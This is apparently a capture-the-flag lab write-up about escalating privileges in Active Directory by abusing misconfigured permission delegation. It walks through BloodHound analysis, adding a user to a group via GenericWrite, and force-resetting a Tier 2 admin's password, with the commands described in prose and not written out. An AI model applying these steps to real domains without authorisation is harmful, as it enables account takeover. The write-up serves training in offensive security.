Exploiting Permission Delegation
Permission delegation is the process of granting specific permissions or authority to a user, group, or system to perform certain tasks to access resources. It is commonly used to allow controlled access without sharing full credentials or privileges
Permission Delegation exploits are often referred to as ACL-based attacks. AD allows administrators to configure Access Control Entries (ACEs) that populates Discretionary Access Control Lists (DACLs), hence the name ACL-based attacks. Almost any AD object can be secured with ACEs. However, if these ACEs are misconfigured, it may be possible for an attacker to exploit them.
Exploiting ACEs
A significant amount of ACEs can be misconfigured, come of them are:
ForceChangePassword: We have the ability to set the user's current password without knowing their current password.
AddMembers: We have the ability to add users (including our own account), groups or computers to the target group.
GenericAll: We have complete control over the object, including the ability to change the user's password, register an SPN or add an AD object to the target group.
GenericWrite: Full write access to the group object, including modifying members, changing descriptions, and even escalating privileges further.
WriteOwner: We have the ability to update the owner of the target object. We could make ourselves the owner, allowing us to gain additional permissions over the object.
WriteDACL: We have the ability to write new ACEs to the target object's DACL. We could, for example, write an ACE that grants our account full control over the target object.
AllExtendedRights: We have the ability to perform any action associated with extended AD rights against the target object. This includes, for example, the ability to force change a user's password.
Tiering
Before proceeding we need to know what is tiering. It is basically a model that is designed to manage assets in a centralized way using least privilege as the core concept.
Tier-0 – Forest and Domain Administrators: Direct or indirect administrative control over the Active Directory forest, domains, or domain controller (DC). This includes administrative access to storage devices that contain Active Directory database files.
Tier-1 – Server Administrators: Direct or indirect administrative control over a single or multiple servers that do not fall into Tier-0. Business critical servers are also in this tier.
Tier-2 – Workstation Administrators, User Administrators, Helpdesk Technicians: Direct or indirect administrative control over a single or multiple devices and day-to-day user accounts.
Bloodhound
For this room, Sharphound was already executed and the data was given in a zip fle
Start neo4j
On another tab start Bloodhound
Change the username and password if needed. My credentials are neo4j:root
Upload the data zip file
Privilege Escalation
If we search for our user account that was assigned in DNS configuration, we can see we have the ability to RDP into THMWRK1 Workstation, but this will only provide us with low-privileged access because we are in the "Domain Users" group
We need to compromise the Tier 2 Admins group since this group has administrative privileges on all workstations. We can ask Bloodhound if there is perhaps a road that we can follow to compromise this group.
As we can see, the IT Support group misconfigured the Permission Delegation with the GenericWrite ACE. This means we can modify the members by adding our user to the IT Support Group.
Furhtermore, Bloodhound shows that the IT Support Group has the ForceChangePassword ACE for the Tier 2 Admins group members. We can change the password of any Tier 2 admins and hijack their account gaining Admin access to the TMHWRK1 Workstation.
First, SSH into the credentials and run Powershell
Add user into the IT Group
Verify it by listing
Now we abuse the ForceChangePassword ACE. Choose any users from this group. I will go with t2_ross.bird
Set the password and reset it
SSH into target
NIce. Noe we should be able to retrieve the flag in Administrator's Desktop
Last updated